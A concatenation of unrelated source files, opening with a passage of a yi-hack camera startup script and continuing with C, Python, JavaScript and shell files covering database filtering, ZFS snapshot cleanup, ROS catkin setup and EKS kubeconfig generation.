echo "127.0.0.1 api.eu.xiaoyi.com" >> /etc/hosts
)
fi
if [[ $(get_config HTTPD) == "yes" ]] ; then
mkdir -p /tmp/sd/record
mkdir -p /tmp/sd/yi-hack/www/record
mount --bind /tmp/sd/record /tmp/sd/yi-hack/www/record
httpd -p $HTTPD_PORT -h $YI_HACK_PREFIX/www/ -c /tmp/httpd.conf
fi
if [[ $(get_config TELNETD) == "no" ]] ; then
killall telnetd
fi
if [[ $(get_config FTPD) == "yes" ]] ; then
if [[ $(get_config BUSYBOX_FTPD) == "yes" ]] ; then
tcpsvd -vE 0.0.0.0 21 ftpd -w &
else
pure-ftpd -B
fi
fi
if [[ $(get_config SSHD) == "yes" ]] ; then
mkdir -p $YI_HACK_PREFIX/etc/dropbear
if [ ! -f $YI_HACK_PREFIX/etc/dropbear/dropbear_ecdsa_host_key ]; then
dropbearkey -t ecdsa -f /tmp/dropbear_ecdsa_host_key
mv /tmp/dropbear_ecdsa_host_key $YI_HACK_PREFIX/etc/dropbear/
fi
# Restore keys
# mkdir -p /etc/dropbear
# cp -f $SONOFF_HACK_PREFIX/etc/dropbear/* /etc/dropbear/
chmod 0600 $YI_HACK_PREFIX/etc/dropbear/*
dropbear -R -B
fi
if [[ $(get_config NTPD) == "yes" ]] ; then
# Wait until all the other processes have been initialized
sleep 5 && ntpd -p $(get_config NTP_SERVER) &
fi
ipc_multiplexer &
sleep 1
if [[ $(get_config MQTT) == "yes" ]] ; then
mqttv4 &
mqtt-config &
fi
sleep 5
if [[ $RTSP_PORT != "554" ]] ; then
D_RTSP_PORT=:$RTSP_PORT
fi
if [[ $HTTPD_PORT != "80" ]] ; then
D_HTTPD_PORT=:$HTTPD_PORT
fi
if [[ $ONVIF_PORT != "80" ]] ; then
D_ONVIF_PORT=:$ONVIF_PORT
fi
if [[ $(get_config ONVIF_WM_SNAPSHOT) == "yes" ]] ; then
WATERMARK="&watermark=yes"
fi
if [[ $(get_config RTSP) == "yes" ]] ; then
RTSP_AUDIO_COMPRESSION=$(get_config RTSP_AUDIO)
if [[ "$RTSP_AUDIO_COMPRESSION" == "none" ]] ; then
RTSP_AUDIO_COMPRESSION="no"
fi
RRTSP_MODEL=$MODEL_SUFFIX RRTSP_RES=$(get_config RTSP_STREAM) RRTSP_AUDIO=$RTSP_AUDIO_COMPRESSION RRTSP_PORT=$RTSP_PORT RRTSP_USER=$USERNAME RRTSP_PWD=$PASSWORD rRTSPServer &
if [[ $(get_config RTSP_STREAM) == "low" ]]; then
ONVIF_PROFILE_1="--name Profile_1 --width 640 --height 360 --url rtsp://%s$D_RTSP_PORT/ch0_1.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=low$WATERMARK --type H264"
fi
if [[ $(get_config RTSP_STREAM) == "high" ]]; then
ONVIF_PROFILE_0="--name Profile_0 --width 1920 --height 1080 --url rtsp://%s$D_RTSP_PORT/ch0_0.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=high$WATERMARK --type H264"
fi
if [[ $(get_config RTSP_STREAM) == "both" ]]; then
if [[ $(get_config ONVIF_PROFILE) == "low" ]] || [[ $(get_config ONVIF_PROFILE) == "both" ]] ; then
ONVIF_PROFILE_1="--name Profile_1 --width 640 --height 360 --url rtsp://%s$D_RTSP_PORT/ch0_1.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=low$WATERMARK --type H264"
fi
if [[ $(get_config ONVIF_PROFILE) == "high" ]] || [[ $(get_config ONVIF_PROFILE) == "both" ]] ; then
ONVIF_PROFILE_0="--name Profile_0 --width 1920 --height 1080 --url rtsp://%s$D_RTSP_PORT/ch0_0.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=high$WATERMARK --type H264"
fi
fi
$YI_HACK_PREFIX/script/wd_rtsp.sh &
fi
SERIAL_NUMBER=$(dd bs=1 count=20 skip=656 if=/tmp/mmap.info 2>/dev/null | cut -c1-20)
HW_ID=$(dd bs=1 count=4 skip=592 if=/tmp/mmap.info 2>/dev/null | cut -c1-4)
if [[ $(get_config ONVIF) == "yes" ]] ; then
if [[ $(get_config ONVIF_NETIF) == "wlan0" ]] ; then
ONVIF_NETIF="wlan0"
else
ONVIF_NETIF="eth0"
fi
if [[ $MODEL_SUFFIX == "r30gb" ]] || [[ $MODEL_SUFFIX == "h52ga" ]] || [[ $MODEL_SUFFIX == "h51ga" ]] || [[ $MODEL_SUFFIX == "q321br_lsx" ]] ; then
onvif_srvd --pid_file /var/run/onvif_srvd.pid --model "Yi Hack" --manufacturer "Yi" --firmware_ver "$YI_HACK_VER" --hardware_id $HW_ID --serial_num $SERIAL_NUMBER --ifs $ONVIF_NETIF --port $ONVIF_PORT --scope onvif://www.onvif.org/Profile/S $ONVIF_PROFILE_0 $ONVIF_PROFILE_1 $ONVIF_USERPWD --ptz --move_left "/tmp/sd/yi-hack/bin/ipc_cmd -M left" --move_right "/tmp/sd/yi-hack/bin/ipc_cmd -M right" --move_up "/tmp/sd/yi-hack/bin/ipc_cmd -M up" --move_down "/tmp/sd/yi-hack/bin/ipc_cmd -M down" --move_stop "/tmp/sd/yi-hack/bin/ipc_cmd -M stop" --move_preset "/tmp/sd/yi-hack/bin/ipc_cmd -p %t"
else
onvif_srvd --pid_file /var/run/onvif_srvd.pid --model "Yi Hack" --manufacturer "Yi" --firmware_ver "$YI_HACK_VER" --hardware_id $HW_ID --serial_num $SERIAL_NUMBER --ifs $ONVIF_NETIF --port $ONVIF_PORT --scope onvif://www.onvif.org/Profile/S $ONVIF_PROFILE_0 $ONVIF_PROFILE_1 $ONVIF_USERPWD
fi
if [[ $(get_config ONVIF_WSDD) == "yes" ]] ; then
wsdd --pid_file /var/run/wsdd.pid --if_name $ONVIF_NETIF --type tdn:NetworkVideoTransmitter --xaddr http://%s$D_ONVIF_PORT --scope "onvif://www.onvif.org/name/Unknown onvif://www.onvif.org/Profile/Streaming"
fi
fi
framefinder $MODEL_SUFFIX &
# Add crontab
CRONTAB=$(get_config CRONTAB)
FREE_SPACE=$(get_config FREE_SPACE)
mkdir -p /var/spool/cron/crontabs/
if [ ! -z "$CRONTAB" ]; then
echo "$CRONTAB" > /var/spool/cron/crontabs/root
fi
if [ "$FREE_SPACE" != "0" ]; then
echo "0 * * * * /tmp/sd/yi-hack/script/clean_records.sh $FREE_SPACE" >> /var/spool/cron/crontabs/root
fi
$YI_HACK_PREFIX/usr/sbin/crond -c /var/spool/cron/crontabs/
# Add MQTT Advertise
if [ -f "$YI_HACK_PREFIX/script/mqtt_advertise/startup.sh" ]; then
$YI_HACK_PREFIX/script/mqtt_advertise/startup.sh
fi
# Remove log files written to SD on boot containing the WiFi password
#rm -f "/tmp/sd/log/log_first_login.tar.gz"
#rm -f "/tmp/sd/log/log_login.tar.gz"
#rm -f "/tmp/sd/log/log_p2p_clr.tar.gz"
#rm -f "/tmp/sd/log/log_wifi_connected.tar.gz"
if [[ $(get_config FTP_UPLOAD) == "yes" ]] ; then
/tmp/sd/yi-hack/script/ftppush.sh start &
fi
if [ -f "/tmp/sd/yi-hack/startup.sh" ]; then
/tmp/sd/yi-hack/startup.sh
fi
|
#! /bin/bash
bash ../Helper/BiomarkerBenchmark/download.sh "https://osf.io/k4sng/download?version=4"
|
<gh_stars>1-10
/*
* src/bin/pgcopydb/filtering.c
* Implementation of a CLI which lets you run individual routines
* directly
*/
#include <errno.h>
#include <getopt.h>
#include <inttypes.h>
#include "env_utils.h"
#include "ini.h"
#include "log.h"
#include "filtering.h"
#include "parsing.h"
#include "string_utils.h"
static bool parse_filter_quoted_table_name(SourceFilterTable *table,
const char *qname);
/*
* filterTypeToString returns a string reprensentation of the enum value.
*/
char *
filterTypeToString(SourceFilterType type)
{
switch (type)
{
case SOURCE_FILTER_TYPE_NONE:
{
return "SOURCE_FILTER_TYPE_NONE";
}
case SOURCE_FILTER_TYPE_INCL:
{
return "SOURCE_FILTER_TYPE_INCL";
}
case SOURCE_FILTER_TYPE_EXCL:
{
return "SOURCE_FILTER_TYPE_EXCL";
}
case SOURCE_FILTER_TYPE_LIST_NOT_INCL:
{
return "SOURCE_FILTER_TYPE_LIST_NOT_INCL";
}
case SOURCE_FILTER_TYPE_LIST_EXCL:
{
return "SOURCE_FILTER_LIST_EXCL";
}
case SOURCE_FILTER_TYPE_EXCL_INDEX:
{
return "SOURCE_FILTER_TYPE_EXCL_INDEX";
}
case SOURCE_FILTER_TYPE_LIST_EXCL_INDEX:
{
return "SOURCE_FILTER_TYPE_LIST_EXCL_INDEX";
}
}
/* that's a bug, the lack of a default branch above should prevent it */
return "SOURCE FILTER TYPE UNKNOWN";
}
/*
* filterTypeComplement returns the complement to the given filtering type:
* instead of listing the include-only tables, list the tables that are not
* included; instead of listing tables that are not excluded, list the tables
* that are excluded.
*/
SourceFilterType
filterTypeComplement(SourceFilterType type)
{
switch (type)
{
case SOURCE_FILTER_TYPE_INCL:
{
return SOURCE_FILTER_TYPE_LIST_NOT_INCL;
}
case SOURCE_FILTER_TYPE_LIST_NOT_INCL:
{
return SOURCE_FILTER_TYPE_INCL;
}
case SOURCE_FILTER_TYPE_EXCL:
{
return SOURCE_FILTER_TYPE_LIST_EXCL;
}
case SOURCE_FILTER_TYPE_LIST_EXCL:
{
return SOURCE_FILTER_TYPE_EXCL;
}
case SOURCE_FILTER_TYPE_EXCL_INDEX:
{
return SOURCE_FILTER_TYPE_LIST_EXCL_INDEX;
}
case SOURCE_FILTER_TYPE_LIST_EXCL_INDEX:
{
return SOURCE_FILTER_TYPE_EXCL_INDEX;
}
default:
{
return SOURCE_FILTER_TYPE_NONE;
}
}
}
/*
* parse_filters
*/
bool
parse_filters(const char *filename, SourceFilters *filters)
{
char *fileContents = NULL;
long fileSize = 0L;
/* read the current postgresql.conf contents */
if (!read_file(filename, &fileContents, &fileSize))
{
return false;
}
ini_t *ini = ini_load(fileContents, NULL);
free(fileContents);
/*
* The index in the sections array matches the SourceFilterSection enum
* values.
*/
struct section
{
char name[NAMEDATALEN];
SourceFilterTableList *list;
};
struct section sections[] = {
{ "exclude-schema", NULL },
{ "exclude-table", &(filters->excludeTableList) },
{ "exclude-table-data", &(filters->excludeTableDataList) },
{ "exclude-index", &(filters->excludeIndexList) },
{ "include-only-table", &(filters->includeOnlyTableList) },
{ "", NULL },
};
for (int i = 0; sections[i].name[0] != '\0'; i++)
{
char *sectionName = sections[i].name;
int sectionIndex = ini_find_section(ini, sectionName, 0);
if (sectionIndex == INI_NOT_FOUND)
{
log_debug("Sections \"%s\" not found", sectionName);
continue;
}
if (strcmp(ini_section_name(ini, sectionIndex), sectionName) != 0)
{
/* skip prefix match, only accept full lenght match */
continue;
}
int optionCount = ini_property_count(ini, sectionIndex);
log_debug("Section \"%s\" has %d entries", sections[i].name, optionCount);
if (optionCount <= 0)
{
continue;
}
/*
* The index in the sections table is a SourceFilterSection enum value.
*/
switch (i)
{
case SOURCE_FILTER_EXCLUDE_SCHEMA:
{
filters->excludeSchemaList.count = optionCount;
filters->excludeSchemaList.array = (SourceFilterSchema *)
malloc(optionCount *
sizeof(SourceFilterSchema));
for (int o = 0; o < optionCount; o++)
{
SourceFilterSchema *schema =
&(filters->excludeSchemaList.array[o]);
const char *optionName =
ini_property_name(ini, sectionIndex, o);
strlcpy(schema->nspname, optionName, sizeof(schema->nspname));
log_debug("excluding schema \"%s\"", schema->nspname);
}
break;
}
case SOURCE_FILTER_EXCLUDE_TABLE:
case SOURCE_FILTER_EXCLUDE_TABLE_DATA:
case SOURCE_FILTER_EXCLUDE_INDEX:
case SOURCE_FILTER_INCLUDE_ONLY_TABLE:
{
SourceFilterTableList *list = sections[i].list;
list->count = optionCount;
list->array = (SourceFilterTable *)
malloc(optionCount * sizeof(SourceFilterTable));
for (int o = 0; o < optionCount; o++)
{
SourceFilterTable *table = &(list->array[o]);
const char *optionName =
ini_property_name(ini, sectionIndex, o);
if (!parse_filter_quoted_table_name(table, optionName))
{
/* errors have already been logged */
(void) ini_destroy(ini);
return false;
}
log_trace("%s \"%s\".\"%s\"",
sections[i].name,
table->nspname,
table->relname);
}
break;
}
default:
{
log_error("BUG: unknown section number %d", i);
(void) ini_destroy(ini);
return false;
}
}
}
(void) ini_destroy(ini);
/*
* Now implement some checks: we can't implement both include-only-table
* and any other filtering rule, which are exclusion rules. Otherwise it's
* unclear what to do with tables that are not excluded and not included
* either.
*/
if (filters->includeOnlyTableList.count > 0 &&
(filters->excludeTableList.count > 0 ||
filters->excludeSchemaList.count > 0))
{
log_error("Filtering setup in \"%s\" contains "
"%d entries in \"%s\" section and %d entries in \"%s\" "
"sections, please use only one of those.",
filename,
filters->includeOnlyTableList.count,
"include-only-table",
filters->excludeTableList.count,
"exclude-table");
return false;
}
/*
* Now assign a proper type to the source filter.
*/
if (filters->includeOnlyTableList.count > 0)
{
filters->type = SOURCE_FILTER_TYPE_INCL;
}
else if (filters->excludeSchemaList.count > 0 ||
filters->excludeTableList.count > 0 ||
filters->excludeTableDataList.count > 0)
{
filters->type = SOURCE_FILTER_TYPE_EXCL;
}
else if (filters->excludeIndexList.count > 0)
{
/*
* If we reach this part of the code, it means we didn't include-only
* tables nor exclude any table (exclude-schema, exclude-table,
* exclude-table-data have not been used in the filtering setup), still
* the exclude-index clause has been used.
*/
filters->type = SOURCE_FILTER_TYPE_EXCL_INDEX;
}
else
{
filters->type = SOURCE_FILTER_TYPE_NONE;
}
return true;
}
/*
* parse_filter_quoted_table_name parses a maybe-quoted qualified relation name
* (schemaname.relname) into a pre-alllocated SourceFilterTable.
*/
static bool
parse_filter_quoted_table_name(SourceFilterTable *table, const char *qname)
{
if (qname == NULL || qname[0] == '\0')
{
log_error("Failed to parse empty qualified name");
return false;
}
char *dot = strchr(qname, '.');
if (dot == NULL)
{
log_error("Failed to find a dot separator in qualified name \"%s\"",
qname);
return false;
}
else if (dot == qname)
{
log_error("Failed to parse qualified name \"%s\": it starts with a dot",
qname);
return false;
}
if (qname[0] == '"' && *(dot - 1) != '"')
{
char str[BUFSIZE] = { 0 };
strlcpy(str, qname, Min(dot - qname, sizeof(str)));
log_error("Failed to parse quoted relation name: %s", str);
return false;
}
char *nspnameStart = qname[0] == '"' ? (char *) qname + 1 : (char *) qname;
char *nspnameEnd = *(dot - 1) == '"' ? dot - 1 : dot;
size_t nsplen = nspnameEnd - nspnameStart + 1;
if (strlcpy(table->nspname, nspnameStart, nsplen) >= sizeof(table->nspname))
{
char str[BUFSIZE] = { 0 };
strlcpy(str, nspnameStart, Min(nsplen, sizeof(str)));
log_error("Failed to parse schema name \"%s\" (%lu bytes long), "
"pgcopydb and Postgres only support names up to %lu bytes",
str,
nsplen,
sizeof(table->nspname));
return false;
}
if (strcmp(dot, ".") == 0)
{
log_error("Failed to parse empty relation name after the dot in \"%s\"",
qname);
return false;
}
char *ptr = dot + 1;
char *end = strchr(ptr, '\0');
if (ptr[0] == '"' && *(end - 1) != '"')
{
char str[BUFSIZE] = { 0 };
strlcpy(str, ptr, Min(end - ptr, sizeof(str)));
log_error("Failed to parse quoted relation name: %s", str);
return false;
}
char *relnameStart = ptr[0] == '"' ? ptr + 1 : ptr;
char *relnameEnd = *(end - 1) == '"' ? end - 1 : end;
size_t rellen = relnameEnd - relnameStart + 1;
if (strlcpy(table->relname, relnameStart, rellen) >= sizeof(table->relname))
{
log_error("Failed to parse relation name \"%s\" (%lu bytes long), "
"pgcopydb and Postgres only support names up to %lu bytes",
ptr,
rellen,
sizeof(table->relname));
return false;
}
return true;
}
|
<filename>lib/car/obj/src/cals_flag_e.c
/* **** Notes
Flag
//*/
# define CALEND
# define CAR
# include "../../../incl/config.h"
signed(__cdecl cals_flag_e(cals_t(*argp))) {
auto signed char **argv;
auto cals_event_t event;
auto signed i,r;
if(!argp) return(0x00);
r = cals_init_event(&event);
if(!r) {
printf("%s \n","<< Error at fn. cals_init_event()");
return(0x00);
}
if(CALS_VERBOSE&(R(flag,*argp))) OR(R(flag,event),CALS_VERBOSE);
argv = (*(CLI_BASE+(R(argv,R(property,*argp)))));
if(!argv) return(0x00);
r = cals_entry(argv,&event);
if(!r) {
printf("%s \n","<< Error at fn. cals_entry()");
return(0x00);
}
OR(R(flag,*argp),CALS_QUIT);
return(0x01);
}
|
#ifndef __C99INT_H__
#define __C99INT_H__
/* Visual Studio 2013+ supports (some of) the c99 standard. */
#if defined(_MSC_VER) && _MSC_VER < 1800
typedef __int8 int8_t;
typedef unsigned __int8 uint8_t;
typedef __int16 int16_t;
typedef unsigned __int16 uint16_t;
typedef __int32 int32_t;
typedef unsigned __int32 uint32_t;
typedef __int64 int64_t;
typedef unsigned __int64 uint64_t;
# define INT16_MIN (-32767 - 1)
# define INT16_MAX (32767)
# define INT32_MIN (-2147483647L - 1)
# define INT32_MAX (2147483647L)
#else
# include <stdint.h>
#endif
#endif /* ifndef __C99INT_H__ */
|
class Gobo:
def __init__(self, x, y, health):
self.x = x
self.y = y
self.health = health
def move(self, new_x, new_y):
self.x = new_x
self.y = new_y
def take_damage(self, damage):
self.health -= damage
def is_alive(self):
return self.health > 0
def collision(self, other, point):
if isinstance(other, Gobo):
# Handle collision with another Gobo
pass
elif isinstance(other, Player):
# Handle collision with a Player
pass
class Player:
def __init__(self, x, y, health):
self.x = x
self.y = y
self.health = health
def move(self, new_x, new_y):
self.x = new_x
self.y = new_y
def attack(self, target):
# Implement attack logic
pass
def is_alive(self):
return self.health > 0
def collision(self, other, point):
if isinstance(other, Gobo):
# Handle collision with a Gobo
pass
elif isinstance(other, Player):
# Handle collision with another Player
pass |
<filename>packages/styled-components/src/models/test/ThemeProvider.test.js
// @flow
/* eslint-disable react/no-multi-comp */
import React from 'react';
import TestRenderer from 'react-test-renderer';
import ThemeProvider from '../ThemeProvider';
import withTheme from '../../hoc/withTheme';
import { resetStyled } from '../../test/utils';
let styled;
describe('ThemeProvider', () => {
beforeEach(() => {
styled = resetStyled();
});
it('should not throw an error when no children are passed', () => {
TestRenderer.create(<ThemeProvider theme={{}} />);
});
it("should accept a theme prop that's a plain object", () => {
TestRenderer.create(<ThemeProvider theme={{ main: 'black' }} />);
});
it('should render its child', () => {
const child = <p>Child!</p>;
const wrapper = TestRenderer.create(
<ThemeProvider theme={{ main: 'black' }}>{child}</ThemeProvider>
);
expect(wrapper.toJSON()).toMatchSnapshot();
});
it('should merge its theme with an outer theme', () => {
const outerTheme = { main: 'black' };
const innerTheme = { secondary: 'black' };
const MyDiv = styled.div``;
const MyDivWithTheme = withTheme(MyDiv);
const wrapper = TestRenderer.create(
<ThemeProvider theme={outerTheme}>
<ThemeProvider theme={innerTheme}>
<MyDivWithTheme />
</ThemeProvider>
</ThemeProvider>
);
expect(wrapper.root.findByType(MyDiv).props.theme).toEqual({
...outerTheme,
...innerTheme,
});
});
it('should merge its theme with multiple outer themes', () => {
const outerestTheme = { main: 'black' };
const outerTheme = { main: 'blue' };
const innerTheme = { secondary: 'black' };
const MyDiv = styled.div``;
const MyDivWithTheme = withTheme(MyDiv);
const wrapper = TestRenderer.create(
<ThemeProvider theme={outerestTheme}>
<ThemeProvider theme={outerTheme}>
<ThemeProvider theme={innerTheme}>
<MyDivWithTheme />
</ThemeProvider>
</ThemeProvider>
</ThemeProvider>
);
expect(wrapper.root.findByType(MyDiv).props.theme).toEqual({
...outerestTheme,
...outerTheme,
...innerTheme,
});
});
it('should be able to render two independent themes', () => {
const themes = {
one: { main: 'black', secondary: 'red' },
two: { main: 'blue', other: 'green' },
};
const MyDivOne = withTheme(styled.div``);
const MyDivWithThemeOne = withTheme(MyDivOne);
const MyDivTwo = withTheme(styled.div``);
const MyDivWithThemeTwo = withTheme(MyDivTwo);
const wrapper = TestRenderer.create(
<div>
<ThemeProvider theme={themes.one}>
<MyDivWithThemeOne />
</ThemeProvider>
<ThemeProvider theme={themes.two}>
<MyDivWithThemeTwo />
</ThemeProvider>
</div>
);
expect(wrapper.root.findByType(MyDivOne).props.theme).toEqual(themes.one);
expect(wrapper.root.findByType(MyDivTwo).props.theme).toEqual(themes.two);
});
it('ThemeProvider propagates theme updates through nested ThemeProviders', () => {
const theme = { themed: true };
const augment = outerTheme => Object.assign({}, outerTheme, { augmented: true });
const update = { updated: true };
let actual;
const expected = { themed: true, augmented: true, updated: true };
const MyDiv = styled.div``;
const MyDivWithTheme = withTheme(MyDiv);
const getJSX = (givenTheme = theme) => (
<ThemeProvider theme={givenTheme}>
<ThemeProvider theme={augment}>
<MyDivWithTheme />
</ThemeProvider>
</ThemeProvider>
);
const wrapper = TestRenderer.create(getJSX());
wrapper.update(getJSX(Object.assign({}, theme, update)));
expect(wrapper.root.findByType(MyDiv).props.theme).toEqual(expected);
});
});
|
import { Router } from "express";
import { processCreditcardPayment } from "./../services/dataHandler";
import CreditCardExpiredError from "./../errors/CreditCardExpiredError";
import Jaeger from "./../jaeger";
import CircuitBreaker from "opossum";
const router = Router();
const opossumOptions = {
timeout: 15000, // If our function takes longer than 15 seconds, trigger a failure
errorThresholdPercentage: 50, // When 50% of requests fail, trip the circuit
resetTimeout: 30000, // After 30 seconds, try again.
};
const breaker = new CircuitBreaker(processCreditcardPayment, opossumOptions);
// TODO: fix jaeger and replace context
const context = {};
/**
* POST /api/v1/payment/charge
* @summary Payment Service Stub
* @bodyContent {Charge} application/json
* @bodyRequired
* @bodyDescription This is the JSON body required when calling the payment service for Bee Travels
* @response 200 - Success
* @response 403 - Invalid query
* @response 404 - Database not found
* @response 500 - Internal server error
*/
router.post("/charge", async (req, res, next) => {
// const context = new Jaeger("charge", req, res);
const data = req.body;
try {
const postProcCCresult = await breaker.fire(data);
return res.json(postProcCCresult);
} catch (e) {
if (e instanceof CreditCardExpiredError) {
return res.status(400).json({ error: e.message });
}
next(e);
}
});
export default router;
|
#include <cmath>
double slerp(double startAngle, double endAngle, double t) {
const double PI = 3.14159265358979323846;
double delta = endAngle - startAngle;
if (delta > PI) {
endAngle -= 2 * PI;
} else if (delta < -PI) {
endAngle += 2 * PI;
}
return startAngle + t * (endAngle - startAngle);
} |
#! /bin/sh
# https://gist.github.com/SkyWriter/58e36bfaa9eea1d36460
# For each of the above filesystems, delete empty snapshots except the latest snapshot
FIRST_RELEASE=2017-08-25
VERSION=1.0
PROJECT_PAGES="https://github.com/Josef-Friedrich/zfs-delete-empty-snapshots.sh"
SHORT_DESCRIPTION='Delete empty ZFS snapshots in a secure manner.'
USAGE="Usage: zfs-delete-empty-snapshots.sh <dataset>
$SHORT_DESCRIPTION
"
_get_datasets() {
zfs list -H -r -p -t snapshot "$1" | \
grep '@' | \
cut -d '@' -f 1 | \
uniq
}
_get_empty_snapshots() {
# -p Display numbers in parsable (exact) values.
zfs list -H -r -p -d1 -t snapshot -o name,used -s creation "$1" | \
sed '$d' | \
awk ' $2 == "0" { print $1 }'
}
## This SEPARATOR is required for test purposes. Please don’t remove! ##
if [ -z "$1" ]; then
echo "$USAGE" >&2
exit 1
fi
DATASETS=$(_get_datasets "$1")
for DATASET in $DATASETS ; do
SNAPSHOTS=$(_get_empty_snapshots "$DATASET")
for SNAPSHOT in $SNAPSHOTS ; do
# See https://www.mail-archive.com/zfs-discuss@opensolaris.org/msg17752.html"
# -p Display numbers in parsable (exact) values.
USED=$(zfs list -H -p -o used "$SNAPSHOT")
if [ "$USED" = "0" ]; then
echo "Destroying empty snapshot “$SNAPSHOT”! (USED=$USED)"
zfs destroy "$SNAPSHOT"
fi
done
done
|
#!/usr/bin/env sh
# generated from catkin/cmake/template/setup.sh.in
# Sets various environment variables and sources additional environment hooks.
# It tries it's best to undo changes from a previously sourced setup file before.
# Supported command line options:
# --extend: skips the undoing of changes from a previously sourced setup file
# --local: only considers this workspace but not the chained ones
# In plain sh shell which doesn't support arguments for sourced scripts you can
# set the environment variable `CATKIN_SETUP_UTIL_ARGS=--extend/--local` instead.
# since this file is sourced either use the provided _CATKIN_SETUP_DIR
# or fall back to the destination set at configure time
: ${_CATKIN_SETUP_DIR:=/home/ossome/obstacle_avoidance/catkin_ws/install}
_SETUP_UTIL="$_CATKIN_SETUP_DIR/_setup_util.py"
unset _CATKIN_SETUP_DIR
if [ ! -f "$_SETUP_UTIL" ]; then
echo "Missing Python script: $_SETUP_UTIL"
return 22
fi
# detect if running on Darwin platform
_UNAME=`uname -s`
_IS_DARWIN=0
if [ "$_UNAME" = "Darwin" ]; then
_IS_DARWIN=1
fi
unset _UNAME
# make sure to export all environment variables
export CMAKE_PREFIX_PATH
if [ $_IS_DARWIN -eq 0 ]; then
export LD_LIBRARY_PATH
else
export DYLD_LIBRARY_PATH
fi
unset _IS_DARWIN
export PATH
export PKG_CONFIG_PATH
export PYTHONPATH
# remember type of shell if not already set
if [ -z "$CATKIN_SHELL" ]; then
CATKIN_SHELL=sh
fi
# invoke Python script to generate necessary exports of environment variables
# use TMPDIR if it exists, otherwise fall back to /tmp
if [ -d "${TMPDIR:-}" ]; then
_TMPDIR="${TMPDIR}"
else
_TMPDIR=/tmp
fi
_SETUP_TMP=`mktemp "${_TMPDIR}/setup.sh.XXXXXXXXXX"`
unset _TMPDIR
if [ $? -ne 0 -o ! -f "$_SETUP_TMP" ]; then
echo "Could not create temporary file: $_SETUP_TMP"
return 1
fi
CATKIN_SHELL=$CATKIN_SHELL "$_SETUP_UTIL" $@ ${CATKIN_SETUP_UTIL_ARGS:-} >> "$_SETUP_TMP"
_RC=$?
if [ $_RC -ne 0 ]; then
if [ $_RC -eq 2 ]; then
echo "Could not write the output of '$_SETUP_UTIL' to temporary file '$_SETUP_TMP': may be the disk if full?"
else
echo "Failed to run '\"$_SETUP_UTIL\" $@': return code $_RC"
fi
unset _RC
unset _SETUP_UTIL
rm -f "$_SETUP_TMP"
unset _SETUP_TMP
return 1
fi
unset _RC
unset _SETUP_UTIL
. "$_SETUP_TMP"
rm -f "$_SETUP_TMP"
unset _SETUP_TMP
# source all environment hooks
_i=0
while [ $_i -lt $_CATKIN_ENVIRONMENT_HOOKS_COUNT ]; do
eval _envfile=\$_CATKIN_ENVIRONMENT_HOOKS_$_i
unset _CATKIN_ENVIRONMENT_HOOKS_$_i
eval _envfile_workspace=\$_CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
unset _CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
# set workspace for environment hook
CATKIN_ENV_HOOK_WORKSPACE=$_envfile_workspace
. "$_envfile"
unset CATKIN_ENV_HOOK_WORKSPACE
_i=$((_i + 1))
done
unset _i
unset _CATKIN_ENVIRONMENT_HOOKS_COUNT
|
const { GraphQLClient } = require('graphql-request');
const btoa = require("btoa");
async function main() {
const endpoint = process.env.TURBOT_GRAPHQL_ENDPOINT;
const accessKeyId = process.env.TURBOT_ACCESS_KEY_ID;
const secretAccessKey = process.env.TURBOT_SECRET_ACCESS_KEY;
const graphQLClient = new GraphQLClient(endpoint, {
headers: {
authorization: 'Basic ' + btoa(`${accessKeyId}:${secretAccessKey}`)
}
});
const query = `
{
resources {
items {
title
}
}
}
`;
const variables = {};
const data = await graphQLClient.request(query, variables)
console.log(JSON.stringify(data, null, 2))
}
main().catch(error => console.error(error))
|
#!/bin/bash
# update/generate kubernetes config file to access eks cluster
set -e
CURDIR=`dirname $0`
EKS_NAME=eks
SPINNAKER_MANAGED=false
export AWS_DEFAULT_REGION=us-east-1
export KUBECONFIG=$CURDIR/kubeconfig
function print_usage() {
echo "Usage: $0 -k <kubeconfig-path> -n(name) <eks-name> -r(region) <aws-region> -s(spinnaker-managed) <true|false>"
}
function process_args() {
if [[ $# < 1 ]]; then
print_usage
exit -1
fi
while getopts ":n:a:r:k:s:" opt; do
case $opt in
n) EKS_NAME="$OPTARG"
;;
r) AWS_DEFAULT_REGION="$OPTARG"
;;
k) KUBECONFIG="$OPTARG"
;;
s) SPINNAKER_MANAGED="$OPTARG"
;;
\?)
>&2 echo "Unrecognized argument '$OPTARG'"
;;
esac
done
}
function init() {
if [ -e $KUBECONFIG ]; then
rm $KUBECONFIG
fi
# update kubeconfig
aws eks update-kubeconfig --name $EKS_NAME
if [ $SPINNAKER_MANAGED = "true" ]; then
local namespace=$EKS_NAME
local serviceaccount=spinnaker-managed
rbac $namespace $serviceaccount
minify $namespace
fi
# restrict access
chmod 600 $KUBECONFIG
}
function rbac() {
local namespace=$1
local serviceaccount=$2
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Namespace
metadata:
name: $namespace
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: $serviceaccount
namespace: $namespace
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: $serviceaccount
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: $serviceaccount
namespace: $namespace
EOF
token=$(kubectl get secret \
$(kubectl get serviceaccount $serviceaccount \
-n $namespace \
-o jsonpath='{.secrets[0].name}') \
-n $namespace \
-o jsonpath='{.data.token}' | base64 --decode)
kubectl config set-credentials $serviceaccount --token=$token
kubectl config set-context $namespace \
--cluster=$(kubectl config current-context) \
--user=$serviceaccount \
--namespace=$namespace
}
function minify () {
local context=$1
kubectl config view --raw > $KUBECONFIG.full.tmp
kubectl --kubeconfig $KUBECONFIG.full.tmp config use-context $context
kubectl --kubeconfig $KUBECONFIG.full.tmp \
config view --flatten --minify > $KUBECONFIG
rm $KUBECONFIG.full.tmp
}
# main
process_args "$@"
init
unset AWS_DEFAULT_REGION
unset KUBECONFIG
|
#!/usr/bin/env bash
PHP_VERSION_MIN="70300"
PHP_VERSION_MAX="70399"
COMPOSER_REQUIRE="$COMPOSER_REQUIRE doctrine/dbal:~2.5"
